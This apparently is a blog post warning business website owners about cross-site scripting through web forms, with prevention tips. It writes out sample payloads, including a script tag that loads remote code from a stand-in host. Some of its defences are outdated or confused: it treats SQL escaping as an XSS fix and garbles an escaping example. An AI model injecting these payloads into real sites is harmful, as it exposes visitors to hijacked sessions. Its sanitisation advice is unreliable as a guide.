Yahoo, Google, Facebook and other big sites are being attacked and your website could be next…
Nerds like me know it’s about XSS. For customers, it’s about unethical business practice.
Last Sunday, I stumbled upon a business investment website. When I was in its homepage, an image suddenly popped up covering at least 1/4 of the screen.
I have seen sites like that before, using popups to grow their own opt-in mailing list but this one is different. Guess what? It’s a porn image popping out of an investment website’s homepage.
You ask what a porn image has got to do with a business information website? Of course nothing at all.
You ask why a business website would ever show such an indecent image right on their front page? Well, I believe they are not even aware of it.
During that instant, I imagined right away the other customers might have gone crazy upon seeing that image. They may even have complained or reported it to the operators of the site. But I tell you, the operators might not even know that the website had already become a “victim” of an XSS attack.
Even without inspecting the site, I know already what took place. It is one of their web forms that was causing it.
I was actually scheduled to write an article on another topic but I thought of writing about this, XSS attack, which I think is a more timely matter. For business website owners and those who are planning to be one, I will have you to know that your good name can be instantly tarnished just through your web forms.
I’m hoping that this article will give you ideas on how to XSS-proof your forms from such future attack.
What is an XSS Attack?
XSS attack or Cross Site Scripting has become very broad nowadays that it could mean many things. Personally, I will simply define it as a type of attack wherein someone injects malicious code into your website.
Code injection usually starts from a webpage where web forms exists. Example of such pages with forms are signup form or registration form, comment form, contact form and login form.
To make it clearer, let me give you some example of an XSS attack:
Let’s say you want to collect comments or feedback from you customers and you want the last 5 comments to appear in the homepage. So you put up a webpage where you allow your visitors to enter their comments in a text box and submit it by clicking a button. After submitting, they will be taken to another page where you will say something like thank you for participating.
So user A will put this entry <b>Your website is great! Well done.</b>. Another visitor, user B, will see your comment in the homepage in bold type. At this point you should see there’s nothing wrong with it.
However, if user A will put <script>alert(‘This is great’);</script>. User B will see nothing in the comment section instead he will see an alert box with a message.
At this point something is going wrong because the comment should be showing inside the comment box rather than via an alert box.
But let’s say user A has entered something like <script>alert(‘BOO’);</script>. Ahh, that’s the time you are get worried because everytime someone accesses your homepage, everyone is getting a negative message.
Now here’s where serious things can happen, user A can enter something like <script src=”pornsite.com/porn.js”></script>. Boom! As soon as this script reach the homepage, everyone accessing the website will see something that is not relevant to the website. The script will run the code from another site and allows it to load its own content in your site. The message could be a porn ads, it could be a racist message, or worst it could be stealing your customers session access.
Anyone Can Do It
Someone doesn’t need to be a Harvard graduate in computer science to know how to attack one’s web forms. Even innocent people may not realize that they have just done an XSS attack to the site they are using by simply copy/pasting data into your forms.
Accept it. It’s a reality in cyber space.
Building a business website takes a lot of hardwork and dedication. For others it takes years to build momentum before they achieve measurable success. Only to have all their hardwork go down the drain because of such rampant acts in the Internet nowadays.
You don’t want this to happen to your site. When these things happen, most likely your customers will leave your site having a bad impression on your business and might even tell it to others. This may mean lasting damage to your reputation.
What to do to protect your business website?
1. Test, test, test.If you’re planning to start up a forum in your website, do a test.
Put this little script in the text entry form:
<script>alert(‘hello’);</script>
If an alert message appears upon viewing the thread, then the forum software that you have just installed is vulnerable to XSS attack.
Do this test with the rest of your forms.
2. Filter any entry from your formsJust like in a business built on bricks and mortar, owners never mind hiring security personnel to guard the main entry gate against unauthorized people entering their vicinity for as long as it will protect their business. From the customers’ standpoint this helps build confidence too because customers think you are concerned for them.
The same holds true if you’re doing business online. The main door from where an XSS attack your website is like the forms in your website.
So in any of your web forms, do not allow users to use tags in their entry. At the most, the only tags that you should allow in entries should be those that are known to be very safe such as <b>, <strong>, <u>, <em>, etc.
Do not allow <script></script> in the data as it is the most notorious among the tags as far as XSS is concern.
If you’re using PHP to create webpages, filtering data can be made simpler by using the strip_tags() function.
3. Moderate user entriesNever allow entries to be published unless you preview the content. However, if you are receiving high volume traffic, you might find this task laborious. In cases like these, make sure that you never allow html tags and javascript codes in the entries.
4. Always validate entries.More often than not, forms are created to gather information and later to be saved in a database. Before you put anything into the database, make sure to follow my suggestions below:
- If you’re asking for an email address, make sure it’s in the correct format.
- If you’re asking for firstname and lastname make sure it’s in alphabet character. If you’re asking for telephone numbers make sure your user enters numeric character only.
- If you’re asking for long text such as comments, do not allow tags as explained above.
- If you’re asking for date, make sure to validate the date.
In programming, double and single quotes have a special purpose. It separates the data from the command. If you escape these special characters, you are simply telling that the entry is a data and not command to be executed. Escaping will surely make the code useless and will not run at all.
In PHP coding, escaping can be as simple as invoking the addslashes() function which will turn ‘ into ‘. If data is to be entered into the mysql database, you can use mysql_real_escape_string() function instead.
Do your homework.
If you have been attracting huge traffic to your site, chances are at least one of your visitors would try to use your traffic for their own sake or simply annoy you with scripting attack that will make you stupid or bad in front of your customers. Don’t give them a chance to ruin your good name. Always remember to implement security on your entry points – your forms.
However, XSS is a broad topic that it doesn’t only involved injecting codes via forms and this is not the scope of this article to discuss them one by one. I would recommend you to read more information about XSS by searching articles in Google.
Do you feel your website is safe?